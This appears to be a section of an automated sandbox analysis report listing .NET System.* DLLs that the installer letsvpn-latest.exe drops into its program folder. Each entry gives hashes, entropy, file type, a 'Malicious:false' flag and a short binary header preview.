                                                                                                                                                                                                  SHA-512:CEF961FFB116A405B457B12E3FAD689AB80E41160F293631B4B9146F6B4F8A0E15DBDF58DCBCA94638DA6FF97C3FB3359FCE92D3D0FDEEE81FB314C9411780EF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ..............................Oj....@..................................(..O....@..T............... ....`.......'............................................... ............... ..H............text... .... ...................... ..`.rsrc...T....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~.. ...t...#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0.....6.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.Encoding.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.887674507025203
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:W9yW7TWjhqWOHlLf2KQcvBZ9yN4S+ShjmM6IGBkSJTo:ofYq3b2KZBZpS+ST6nkko
                                                                                                                                                                                                  MD5:EE18D84D95C0F1535EA84126F1CEBC56
                                                                                                                                                                                                  SHA1:EFB937BE1FBBB7149F49C3BB3860A511BC789072
                                                                                                                                                                                                  SHA-256:C659E7D9EF2F3E72FF750CDBF5792D327F012782C3F888449546558C352E8925
                                                                                                                                                                                                  SHA-512:1DECAD4D100507A1878C254A83CEDBA000493DF972A4CDB1D955FFA4E1EC31485DAB0AC842F12185E9169A85A86301FCF18D61A175B43C2400B3024C384DACEB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............2*... ...@....... ...............................B....@..................................)..O....@.................. ....`.......(............................................... ............... ..H............text...8.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ......................((......................................BSJB............v4.0.30319......l...0...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0...........D.7.....7.....7...C.7.....7.....7...[.7...x.7...-.0.....7.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.RegularExpressions.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):7.012009934217988
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:06Rb32WVzWFhqWOHlLf2KQcvBZ9VBcuS+ShjmM6IGBkSvU:DRb3daq3b2KZBZrdS+ST6nkEU
                                                                                                                                                                                                  MD5:87470FF818547DFB3CF7813EB07C9617
                                                                                                                                                                                                  SHA1:555FA45A05C9E803617EA872BE534E65009B3504
                                                                                                                                                                                                  SHA-256:6F6CE08335FA5FA55278C254FCE2D4DC611531AA53F7DE574991BBAD7888F28E
                                                                                                                                                                                                  SHA-512:3E941B496B0635AC719052CC0ED4B2A0B941D30E50261E46D53CEAA3F120970655EACD6DE7C63460CBB9F4B603EEAE9B3EF251C32ACE5668FF37BF4282CEAC93
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ..............................#.....@.................................t)..O....@..P............... ....`......<(............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................)......H.......P ..l....................'......................................BSJB............v4.0.30319......l.......#~..........#Strings....@.......#US.D.......#GUID...T.......#Blob......................3..................................................K...d.K...8.8...k.....L.................K.................c...........5.........................2.....2.....2...).2...1.2...9.2...A.2...I.2...Q.2...Y.2...a.2...i.2...q.2.......................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.AccessControl.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):32800
                                                                                                                                                                                                  Entropy (8bit):6.421442296570712
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:7MWavA+YHfsZtaOq3b2KZBZcNmS+ST6nk0:7CvA+YEuB3qKD/mC
                                                                                                                                                                                                  MD5:D6DB8C4DD199D5EA11638B21B2DA3516
                                                                                                                                                                                                  SHA1:D1853A51FEF8536FBE2B01BB84053E058FDAED04
                                                                                                                                                                                                  SHA-256:D6A7F97C2E73061FE74C5F890984C8F58653FE68BE3BEEF507F6530DE2896309
                                                                                                                                                                                                  SHA-512:956C15A5FCC5B746D18FABADFE1BFDBF40509BF617C18CF7A4AC47A7739E6FC56F115450871B8C4C5DC999FF9B816241C1E3F49F366358ACABC632C8AEB0AF90
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..D..........zb... ........... ..............................|{....`.................................%b..O.......l............R.. ...........(a..T............................................ ............... ..H............text....B... ...D.................. ..`.rsrc...l............F..............@..@.reloc...............P..............@..B................Yb......H........%..$-...........R.......`........................................(....*^.(.......*...%...}....*:.(......}....*:.(......}....*:.(......}....*.~....*.0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...( ...*.(...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Overlapped.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):33312
                                                                                                                                                                                                  Entropy (8bit):6.627433940507071
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:nu5I+sqOylryry8qqIfUc7a5Fq3b2KZBZ1S+ST6nkv7:nYIVBpry8qqIfUcm5A3qKX/mx7
                                                                                                                                                                                                  MD5:500D590818EEB1D5F425F37A29B4DD6F
                                                                                                                                                                                                  SHA1:C97012B1C9E7BB5E1C4DB172828535986B9B5800
                                                                                                                                                                                                  SHA-256:F5B75FE483F7AE77438E8E5158E7ED5BBCD16BA2787AA92FE69596C0205BA836
                                                                                                                                                                                                  SHA-512:BA1C02BAA82BCCB1A391156E0B2070CEF76E4DD3B35C30BB5060C9320574ECE35F11FE19B077E24287B6AC53BFDE59F858D4D64CCA2CEB4AD5F05E2493EF2229
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..F...........d... ........... ...................................@..................................c..O.......x............T.. ............c............................................... ............... ..H............text....D... ...F.................. ..`.rsrc...x............H..............@..@.reloc...............R..............@..B.................c......H........&...7...........^.......b......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2rK..p.(....*2ry..p.(....*2r...p.(....*2r...p.(....*2rc..p.(....*......(....*..0..;........|....(......./......(....o....s

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.Extensions.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28704
                                                                                                                                                                                                  Entropy (8bit):6.595812815283715
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:MRZ4nNxnYTb6Blh9q3b2KZBZiiS+ST6nkb:PYTb6vho3qKb/mh
                                                                                                                                                                                                  MD5:8E14D9F0BF87605E6535D68B0FD8C56B
                                                                                                                                                                                                  SHA1:A9D03FC849BEDD0C91A891E26B670A408D446D6E
                                                                                                                                                                                                  SHA-256:C7B3C34060A40BBE58CE03D4B296556B7186D08FE9A99E27D4A15951CF2CF80C
                                                                                                                                                                                                  SHA-512:4178EDB29B147D35A4F826B19EF220FC8EAE704BB3D1354058A41E775CB517B5576D7793C8BD6DA07C986EA2E2464844AF7BC95E3659661901F35BD437649BC5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..8...........V... ...`....... ...................................@..................................V..O....`...............B.. ...........PU............................................... ............... ..H............text....6... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................V......H........0...$...................T........................................(....*..(....z..(....z2.(....s....*2.(....s....*:........o....*.~....*~.-..(......}......}......}....*~.-..(......}......}......}....*Z..}......}......}....*J.{....%-.&.*o....*^.u....,........(....*.*~.{.....{....3..{.....{......*.*&...(....*2...(.......*....0..'........{......,..u....%-.&..(...+(....*(....*n.{....,..(....s....*.q....*..0..a.........{....o0.....,;..{....o2...(......;...3.~.......s......

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.Parallel.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.97531319551383
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Fvn4HREpWiQWjhqWOHlLf2KQcvBZ9fbS+ShjmM6IGBkSj:qSHq3b2KZBZlS+ST6nkI
                                                                                                                                                                                                  MD5:BB76B6B59F9B91669E4E620BCFBF45E0
                                                                                                                                                                                                  SHA1:4B251EBC28FE4C9257080EFC7B4146F7F2025230
                                                                                                                                                                                                  SHA-256:71E214159B5342A03F6343C4ECA5623C6948455BA2F509720BFDE70D804B35C7
                                                                                                                                                                                                  SHA-512:9255352F3A3FE4A63DC05D191F604E47D7C2681CFAE90CC412937EB9D47ACA79E3C32DD6B491F2FB4E1391A452E7D9C5D3317E63A4C1B6460E532FA96FC488AE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ....................................@..................................(..O....@..P............... ....`......x'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......l...#Strings....|.......#US.........#GUID...........#Blob......................3......................................................n.....B.....".....V.................U...........$.....m...........?.....(...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.878055743773289
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:y8MjKb47T3UCcqFMkJ59WdtW0hqWOHlLf2KQcvBZ98imTKS+ShjmM6IGBkSubu:/MjKb4vcGdObq3b2KZBZbCKS+ST6nk7S
                                                                                                                                                                                                  MD5:539E2BD6B494B24A740542D5848CEAD2
                                                                                                                                                                                                  SHA1:C9E763F47309E326958EDF77BCAF6A220B1E69B9
                                                                                                                                                                                                  SHA-256:34D54D62F359CAFFF810A522F654B02BF00C8EC5B0315D37C343673223272DED
                                                                                                                                                                                                  SHA-512:CEB43F8BD718ACACFD52B2BFE7DB3ED043E465E2133B0F86C7582C9FECDB58CD08ECBB1A1F4D975581227E235A785BD9C9F2309857C0C7F6588D3AC71E6E65AC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............,... ...@....... ..............................I.....@.................................`,..O....@.................. ....`......(+............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H.......P ..X....................*......................................BSJB............v4.0.30319......l...<...#~..........#Strings....4.......#US.8.......#GUID...H.......#Blob......................3................................!.....O.......................................].....z.............................7.......j...........n...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Thread.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.969645890003852
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:LzyNXd4+BW6FWahqWOHlLf2KQcvBZ9nxdS+ShjmM6IGBkSE0:Czhq3b2KZBZxS+ST6nkA
                                                                                                                                                                                                  MD5:CF6552D68B6F1C55F3C689DD9C0EE2E6
                                                                                                                                                                                                  SHA1:37723E957F45EF8A943BAB49EDAA7EA4F18EEA23
                                                                                                                                                                                                  SHA-256:2CE7C251CE22D21A90E801EE0264778CD292A9271CF50B9FEB8F5762CCD4BF97
                                                                                                                                                                                                  SHA-512:50256B2D874FF70AEB52838EB64E7B8C7DBF3E2D5617EDF3E711648FB65C6E0234AA4660FBFC0AECF598F1E318B42CE57AB1141F1D2A7BC7312EEC52C452B9CF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ....................................@..................................(..O....@.................. ....`.......'............................................... ............... ..H............text... .... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..,...p...#Strings............#US.........#GUID...........#Blob......................3..................................................'.....'...T.....G.....h.................g...........6.................Q.....:...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.ThreadPool.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.96528000837832
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Zvs2Q3HKJNrWWRWOhqWOHlLf2KQcvBZ93d6S+ShjmM6IGBkSzL:ZuM9q3b2KZBZv6S+ST6nkML
                                                                                                                                                                                                  MD5:1592C7E948FF7CDFE8D93D07B285AB46
                                                                                                                                                                                                  SHA1:84A0AFFB12888F576A8367AB3FFE3311CDC0E781
                                                                                                                                                                                                  SHA-256:D39637DA74B212D707EF62FFB5508AA03D33EACB3CE467519C018691178AE9BB
                                                                                                                                                                                                  SHA-512:EB71D470608717A1321CBDDA85484D091BE992FD23983BF2212CA2088FC613F8E13BFAB85F48C7FBA8199508F0E6F2446F6E414A8FDB9D7AB28E180C80FFC3F4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ..............................u.....@..................................(..O....@..4............... ....`......h'............................................... ............... ..H............text........ ...................... ..`.rsrc...4....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......`...#Strings....p.......#US.t.......#GUID...........#Blob......................3................................................../...q./...E.....O.....Y.................X...........'.....p...........B.....+...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.8...K.X...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Timer.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.93954537010736
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:vFz0Q6gcqRhcsMWdMW3hqWOHlLf2KQcvBZ9viS+ShjmM6IGBkSPC:vFz1c67q3b2KZBZIS+ST6nkV
                                                                                                                                                                                                  MD5:15CDE5130A757AE138879A5B76880593
                                                                                                                                                                                                  SHA1:4B29C1BD9B3809A39607A3D972280DFE7CCD07A1
                                                                                                                                                                                                  SHA-256:3469C44E1E8480D20FECD1A45151BB9C7DE737B8F906F28D793838AA04200877
                                                                                                                                                                                                  SHA-512:A4DD3CA58859CFC9FD9690E3145297452EEED596FD7360EB2D863677598726427B7DC5C860EEF56BA8538A204A4C6ACCFDC9ABE8D1FD1323B766EB039FEE70A3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ....................................@.................................L(..O....@.................. ....`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..D....................&......................................BSJB............v4.0.30319......l.......#~......,...#Strings.... .......#US.$.......#GUID...4.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.837689115862053
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:F6xWA3W4aW/NWChqWOHlLf2KQcvBZ96U9HS+ShjmM6IGBkSB:FaBRq3b2KZBZ9JS+ST6nkW
                                                                                                                                                                                                  MD5:22012E4D0DD60A9988E005A03199702F
                                                                                                                                                                                                  SHA1:1EAF9418A32EC551423F8B51946F74A3E1517252
                                                                                                                                                                                                  SHA-256:D3B318DFF6DA0D3646A56C124F1A81A3111CD12730356F8396888F2CF074D61F
                                                                                                                                                                                                  SHA-512:E7FC15AE7FE54013803B242C945D670596B412C98BC8FEFE000110176217B7D7523D5E2424093D138CBA04B7C0937A7E8CB54E963D66E1533283E10259F8D2DB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............,... ...@....... ...................................@..................................+..O....@.................. ....`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H.......P .......................*......................................BSJB............v4.0.30319......l... ...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................-.........O.k.....k.....X.....................1...........o.........................B...........9...........J.....J.....J...).J...1.J...9.J...A.J...I.J...Q.J...Y.J...a.J...i.J...q.J.......................#.....+.....3.....;.....C.-...K.M...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ValueTuple.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):74784
                                                                                                                                                                                                  Entropy (8bit):5.993362873950785
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:r784YWau8lqubx6WxXLA+o2SLFyEdux136ytgHo0AuresehSAS3qKw/mg:r7NV8v36tI0XCKASM//
                                                                                                                                                                                                  MD5:B858455996C84CB4A2E23E77F5DD2052
                                                                                                                                                                                                  SHA1:E3C301E11B436F05BDD431515EA0AC4EE8F3E621
                                                                                                                                                                                                  SHA-256:56CA971A57FFE258049F47CF0C292BA33FC8206A2B6006391CA9C222BF959AF3
                                                                                                                                                                                                  SHA-512:7E54B175EB40304211EB9C0CAACF1CDF51C2679C940B33AF679165F3EAAA3B1531BC53F9F98FCD431E55DF0CCFE12C464DE0F3783AE13FBC6EF2AA4EC1294442
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`......]D....@.....................................O.... ..P............... ....@......x................................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H......................................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Web.Services.Description.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18976
                                                                                                                                                                                                  Entropy (8bit):6.822573815542487
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:vvx21MWeLqW5nhqWOHlLf2KQcvBZ9gnHWma4S+ShjmM6IGBkSk:vJ2Wthq3b2KZBZ94S+ST6nk3
                                                                                                                                                                                                  MD5:9016D24A15C0FCABCA9B195685D546D3
                                                                                                                                                                                                  SHA1:3F59CC68BDE25DB5B256DD72608E53F243003027
                                                                                                                                                                                                  SHA-256:C19FA40FC81ADD0E8FA598F03BDEC26B4DBEA3501DF5658E06927CDC6E15FA49
                                                                                                                                                                                                  SHA-512:621081DD9967702E4FE16BAD789DC3D5D3BD725E77C17AEA6BE56D0E4920E647C7D54DA8C1D1FEA56C051D03ECE545781BBD6B8F02473F34261981334D0CCBC2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s.~..........." ..0.............:1... ...@....... ....................................`..................................0..O....@.................. ....`......./..T............................................ ............... ..H............text...@.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................1......H.......P .. ...................p/......................................BSJB............v4.0.30319......l...h...#~..........#Strings............#US.........#GUID.......4...#Blob......................3................................F...............4.c.....c...o.<...............U...........m.......................T.............2.................6.....6.....6...).6...1.6...9.6...A.6...I.6...Q.6...Y.6...a.6...i.6...q.6.......................#.....+.*...+.F...+.\...3.r...;.....C.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Windows.Interactivity.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):51744
                                                                                                                                                                                                  Entropy (8bit):6.2708476869450225
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:o3wBccZdxuB8mQen6JxKjrlMZgR0Eot3qKY/mN:WcHmQPUktc/C
                                                                                                                                                                                                  MD5:9BD8BABD259D5301A0A1E5050A163BAE
                                                                                                                                                                                                  SHA1:38D666BB5268A260EA6AA38369FB82CC6029F9EA
                                                                                                                                                                                                  SHA-256:57D256764D6E780D505AFA63479A1C2A7A374079D0F93CC57C4967367585ACAE
                                                                                                                                                                                                  SHA-512:38F6FD5C2212C276D3C42C145012C4F3DBD95F7E93A817C8E988343B8B2CEF65A953529BE7313C38C1F0639C617B0E0D9D828B647E0DD0A35DCEF463096ACF4C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...du.K...........!..................... ........ ;. ....................................@.................................\...O....................... ............................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......4O..X`..........xD......P ......................................{c...2......q..Z,.C.....3.n.Z..7....R.....T.{yF")i.$JMv...,a.....U...M:,...Z.Q:..c..N.{....<....h%.....:s..T...Z.gSI.....6.(.....{....*...0..&........(..............s....o.....s....}....*...0..K........(.....{....o........,3..+&..( .........{.....o!............*..X...(....2.*..0..L........{.....o"...,=(#...(..................($...o%.......(&...o%.....('...s(...z*.0...........o).......E............d

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.ReaderWriter.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.955210507891377
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:3r97WquWYhqWOHlLf2KQcvBZ9A9S+ShjmM6IGBkSiaj:3RJ4q3b2KZBZYS+ST6nk5e
                                                                                                                                                                                                  MD5:359E96F1E3D4CF1B45357D9C02ACCEB9
                                                                                                                                                                                                  SHA1:B30FB5FB93B571E01F207AA954CCEA96253C4653
                                                                                                                                                                                                  SHA-256:75DC6A7021B4E412B98664D1C5017F458607B84C81D0BAA08B76F6F2005AFAC1
                                                                                                                                                                                                  SHA-512:A765E663ED6BED9C1EC8D59CAEA541F4C6AD3FE262A008FEADD5011D90E5D7E4B26F60F3E4A9BE7B8B68C420713103ADDCBE8D0930A10E8CF262ED4C5B656ED8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............+... ...@....... ..............................(.....@.................................\+..O....@.................. ....`......$*............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H.......P ..T....................)......................................BSJB............v4.0.30319......l.......#~..T.......#Strings....0.......#US.4.......#GUID...D.......#Blob......................3......................................z...........j.....j.....W...............B.....z.............................................................Q.....Q.....Q...).Q...1.Q...9.Q...A.Q...I.Q...Q.Q...Y.Q...a.Q...i.Q...q.Q.......................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XDocument.dll

                                                                                                                                                                                                  Download File
